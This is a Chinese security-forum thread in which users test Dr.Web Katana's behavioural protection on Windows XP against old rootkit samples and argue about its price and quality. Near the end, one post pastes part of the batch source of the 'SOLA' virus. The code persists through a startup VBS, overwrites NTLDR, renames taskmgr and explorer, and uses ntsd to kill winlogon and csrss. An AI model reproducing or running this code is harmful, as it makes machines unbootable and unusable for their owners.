浅尝dr.web Katana云主动防御软件在xp下使用效果。

New_Start.

由于圣诞DR.WEB大撒码，又看到了它支持XP，具备非扫描特征，云识别的特点，想着也许可以给老机子试试，加强防护，于是就稍微测了一下这个主防在XP下的效果如何。



首先是安装。


一贯的简洁绿







圣诞码不行，意料之内，想白嫖失败

设置很少，主界面都没有，只有设置界面。




其实应该向卡巴应用程序控制学习，自动判断最好，一般人没有空去为程序一一设置权限。


这模式感觉非常不安全，如果云识别率不行的话简直是灾难。


下面开始进行兼容性测试以及病毒感染测试。

病毒主要从RTK防范这方面进行测试，因为这类病毒危害最大，技术要求最高，也具备共有特征，会加载驱动，看看DR.WEB会不会拦截这些恶意驱动的加载。由于是XP系统，最为自由，病毒和反病毒软件都可以具备最大权限，发挥最多的动作。

兼容性测试，配角为卡巴老斯基2012，作为参照。



卡巴能够检测到DRWEB的驱动安装，拦截会失败，DRWEB顺利安装，自保还是挺厉害的。卡巴这个版本是最后一个保留主动防御组件的版本。


DRWEB存在2个进程，一个是UI，另一个是服务，也就是执行。实测和卡巴共存和谐，系统丝滑流畅，性能可以，说明兼容性不错。

现在开始病毒测试，用的都是老病毒，而且较为知名，个人猜测应该不存在无法检出的问题吧~但事实打脸了。

测试1：该病毒流行于2018~2020。
结果：失败。全程静默无反应，病毒顺利随系统加载，成功获取系统最高权限，正常情况下这台电脑会成为肉鸡@吧。

神龟Turmi

Katana的主要问题已经不是效果怎么样了。。。是它比完整的SS都要贵
并且SS/Avdesk也包含Katana
不是很理解为什么会有单独买Katana的需求

蓝泽祈

虚拟机装一个Win10测

New_Start.

神龟Turmi 发表于 2023-1-28 04:33
Katana的主要问题已经不是效果怎么样了。。。是它比完整的SS都要贵
并且SS/Avdesk也包含Katana
不是很理 ...

這東西宣傳可以共存...不影响其他反病毒软件，跟卡巴那个是同类吧，之前觉得DRWEB杀软较为拉跨，想着主防也许可以用用的。

看了一下，一年98，没有比SS等贵呀？？

https://estore.drweb.cn/home/katana/?lng=en

New_Start.

蓝泽祈 发表于 2023-1-28 12:54
虚拟机装一个Win10测

你来吧，写帖子觉得好累。

IamAngry

New_Start. 发表于 2023-1-28 13:12
這東西宣傳可以共存...不影响其他反病毒软件，跟卡巴那个是同类吧，之前觉得DRWEB杀软较为拉跨，想着主防 ...

然而DrWeb的主防也很拉胯，没什么好用的

zxcbenny

IamAngry 发表于 2023-1-28 14:50
然而DrWeb的主防也很拉胯，没什么好用的

Katana 不是说本身的设计是传统杀毒软件的补充吗。
DR.WEB的完全体 主动防御应该是可以的。

IamAngry

zxcbenny 发表于 2023-1-28 17:16
Katana 不是说本身的设计是传统杀毒软件的补充吗。
DR.WEB的完全体 主动防御应该是可以的。

你试下各种样本就知道了，DrWeb的主防就二流水平。卡巴的KART爆杀

nikonikoni

IamAngry 发表于 2023-1-28 17:18
你试下各种样本就知道了，DrWeb的主防就二流水平。卡巴的KART爆杀

用蜘蛛就是冲他的墙玩的
我挺喜欢那个“防止设备丢失”和“行为分析”的

15717522768

这么差......

我是风我是风

很久没有用大蜘蛛了，已经不知道效果了

网名丢失

我是风我是风 发表于 2023-1-28 22:38
很久没有用大蜘蛛了，已经不知道效果了

已经不太行了

3c89

LZ敢不敢试试用CIH最早的版本来看看大蜘蛛的反应

New_Start.

3c89 发表于 2023-1-29 19:36
LZ敢不敢试试用CIH最早的版本来看看大蜘蛛的反应

太老了，似乎在xp上不生效。用的这个版本，zip错误。https://bbs.kafan.cn/thread-2183903-1-1.html

3c89

New_Start. 发表于 2023-1-29 21:09
太老了，似乎在xp上不生效。用的这个版本，zip错误。https://bbs.kafan.cn/thread-2183903-1-1.html

看到有个叫苏拉的病毒

    我对此感兴趣，您试试

星云劫

New_Start. 发表于 2023-1-28 13:12
這東西宣傳可以共存...不影响其他反病毒软件，跟卡巴那个是同类吧，之前觉得DRWEB杀软较为拉跨，想着主防 ...

SS版在中国官网上选无技术支持版的话，108元单设备三年。

如果是去找国内代{过}{滤}理商买的话，价格为单设备三年79元，双设备三年128元。提供官方技术支持和代{过}{滤}理商三个月客服售后。

因此，这个独立主防的版本确实价格偏高。而且以前SS版的激活码是能用在独立主防版本上面的，现在就不太清楚了。

New_Start.

3c89 发表于 2023-1-29 21:49
看到有个叫苏拉的病毒

    我对此感兴趣，您试试

我猜不会杀吧，我上面测的都比这个明显得多亚，这个有点joke的意思。

苏拉SOLA部分代码
:Virus
if not "%Runtime%"=="0" goto VirusChk
set /a RunTime=%Runtime%-1
echo !%Runtime%>%sola%\RunTime.txt
cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"
echo On Error Resume Next>TENBATSU.VBS
echo set ws=wscript.createobject("wscript.shell")>>TENBATSU.VBS
echo ws.run "%sola%\sola.bat -Tenbatsu",0 >>TENBATSU.VBS
goto Diskchk

:VirusChk
if not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS" goto Kill
goto Diskchk

:Tenbatsu
:KillNTLDR
attrib %systemdrive%\NTLDR -s -h -r
copy /Y %systemdrive%\NTLDR %sola%\NTLDR
echo NO NTLDR>%systemdrive%\NTLDR
::attrib %systemdrive%\NTLDR +s +h +r

:PauseSFC
start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()"

:KillTaskmgr
del /q /a %systemroot%\system32\dllcache\taskmgr.exe
taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe taskmgr.xxx & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500
ren %systemroot%\system32\taskmgr.exe taskmgr.xxx

:KillExplorer
taskkill /f /im explorer.exe >nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe explorer.xxx & start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()" & sleep 500
ren %systemroot%\explorer.exe explorer.xxx
start /max %setup%\TENBATSU.BAT

:Timeset
sleep 660000
if exist %sola%\Killself Exit

:Kill
attrib %systemdrive%\NTLDR -s -h -r
echo NO NTLDR>%systemdrive%\NTLDR
::attrib %systemdrive%\NTLDR +s +h +r
tasklist >%sola%\Task.txt
FOR /F "tokens=2" %%i in ('findstr /I "csrss.exe" "%sola%\Task.txt"') do ntsd -p %%i
goto Diskchk



:KillSelf
:StartExplorer
ren %systemroot%\explorer.xxx explorer.exe
start %systemroot%\explorer.exe
:BackNTLDR
attrib %systemdrive%\NTLDR -s -h -r
copy /Y %sola%\NTLDR %systemdrive%\NTLDR
attrib %systemdrive%\NTLDR +s +h +r

:RenTmg
ren %systemroot%\system32\taskmgr.xxx taskmgr.exe

:KillVirus
copy %setup%\KillVirus.txt %sola%\KillVirus.txt
C:
cd\
md ~Install
cd ~Install
rar x -hpkakenhi200601 %setup%\SolaKiller.rar
mshta "javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()"
rd /s /q %setup%
attrib %systemroot%\Tasks\Tasks.job -s -h -r
del %systemroot%\Tasks\Tasks.job
cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"
if exist sola.vbs del sola.vbs
if exist tenbatsu.vbs del tenbatsu.vbs
start %systemroot%\system32\notepad.exe %sola%\KillVirus.txt
del %sola%\sola.bat
Exit

dnv555

我用了一段时间katana，反正很失望，不想说了，反正不建议用它，差的很

ikochina1

New_Start. 发表于 2023-1-28 13:12
這東西宣傳可以共存...不影响其他反病毒软件，跟卡巴那个是同类吧，之前觉得DRWEB杀软较为拉跨，想着主防 ...

ss三方店三年才几十块

ikochina1

nikonikoni 发表于 2023-1-28 18:50
用蜘蛛就是冲他的墙玩的
我挺喜欢那个“防止设备丢失”和“行为分析”的

很多人却嫌弃那个墙啊，其实那个墙确实比较好玩，单纯主防确实防御点比较少，配合文件保护防勒索却效果杠杠滴，蜘蛛的云基本上就是个摆设，谁叫它家不上传陌生文件的呢